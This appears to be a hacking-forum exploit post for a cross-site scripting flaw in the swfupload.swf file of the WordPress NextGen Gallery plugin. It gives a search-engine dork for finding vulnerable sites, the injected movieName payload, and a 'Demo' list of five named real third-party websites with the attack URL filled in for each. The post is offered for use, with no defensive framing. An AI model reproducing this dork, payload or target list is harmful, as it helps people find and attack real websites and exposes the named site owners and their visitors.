Kod:
Exploit title:WordPress NextGen (swfupload.swf) Cross Site Scripting vulnerability
Dork:
:inurl:"/wp-content/plugins/nextgen-gallery/"
Tested:KaliLinux
Exploit:
http://www.test.com/[PATH]/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('HaCKed');//
Demo:
http://ludotines.com/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert('HaCKed');//
http://lsgkerala.in/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert('HaCKed');//
http://www.apollomotors.fr/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert('HaCKed');//
http://stoned-gatherings.com/WordPress3/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert('HaCKed');//
http://www.coachandco.fr/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert('HaCKed');//